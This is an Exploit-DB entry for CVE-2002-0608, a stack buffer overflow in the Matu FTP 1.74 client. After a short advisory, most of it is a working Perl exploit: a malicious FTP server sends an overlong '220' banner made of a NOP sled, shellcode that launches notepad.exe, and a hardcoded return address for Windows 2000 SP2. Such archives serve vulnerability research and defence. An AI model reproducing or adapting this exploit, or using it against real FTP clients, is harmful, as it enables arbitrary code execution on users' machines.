Matu FTP 1.74 Client Buffer Overflow Vulnerability

ID EDB-ID:21410
Type exploitdb
Reporter Kanatoko
Modified 2002-04-23T00:00:00


Matu FTP 1.74 Client Buffer Overflow Vulnerability. CVE-2002-0608. Remote exploit for windows platform


An issue has been reported which could allow for a malicious ftp server to execute arbitrary code on a Matu FTP client. 

If,upon user connection, a FTP server '220' response is of excessive length, a stack-based overflow condition could occur. This overflow could overwrite stack variables and be used to execute arbitrary code. However, sending random data could cause the application to crash.


# Matu Ftp Version 1.74 exploit for Windows2000 Professional (SP2)
# ( run under inetd )
# written by Kanatoko <>

        #egg written by UNYUN (
$egg  = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
$egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
$egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
$egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
$egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";
$egg .= "notepad.exe";

        #egg_address = 0x0012F43C
$buf = "\x90" x 217;
$buf .= $egg;
$buf .= "A" x 2;
$buf .= "\x3C\xF4\x12\x00";
$buf .= "B" x 80;

print "220 $buf\r\n";